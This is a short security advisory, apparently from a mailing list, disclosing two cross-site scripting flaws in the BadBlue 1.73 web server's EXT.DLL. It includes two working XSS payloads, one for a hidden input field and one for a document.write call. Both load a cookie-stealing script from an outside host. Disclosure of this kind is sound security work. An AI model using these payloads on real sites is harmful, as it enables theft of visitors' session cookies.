BadBlue 1.73 EXT.DLL XSS Variant

["Matthew Murphy" <mattmurphy () kc rr com>]

Advisory: Variant of BID #5086 Discovered in BadBlue
1.73

As I originally reported in my alert regarding the ext.dll of
BadBlue, it is prone to XSS attacks.  EXT.DLL has been
re-written to generate its HTML differently as of BBPE
1.73.  Rather than simply placing it in the output, BadBlue
passes the query on to a function called 'cleanSearchString'.

However, two vulnerabilities still exist.  One vulnerability
introduced in BBPE 1.73 (cleanSearchString) and another
that wasn't patched from the older versions (the INPUT
vulnerability)

When searching for "<>", we find two locations where our
query is passed as a literal to the browser:

document.write(cleanSearchString('<>'));
<input type=hidden name=a0 value="<>">

In order to exploit the input vulnerability, the query is rather
obvious:

"><script src=http://www.murphy.101main.net/cookie.js></script>

However, don't be fooled by the complexity of the document.write()
call, either, this is still exploitable. :-D

') + '\x3cscript
src=http://www.murphy.101main.net/cookie.js\x3e\x3c/script\x3e&apos;

The Moral of This Story?

No matter how you 'clean' it before writing client-side, if input is
displayed literally at ANY point in the document, it can be used to
divert the flow of execution to an attacker-supplied payload.

"The reason the mainstream is thought
of as a stream is because it is
so shallow."
                     - Author Unknown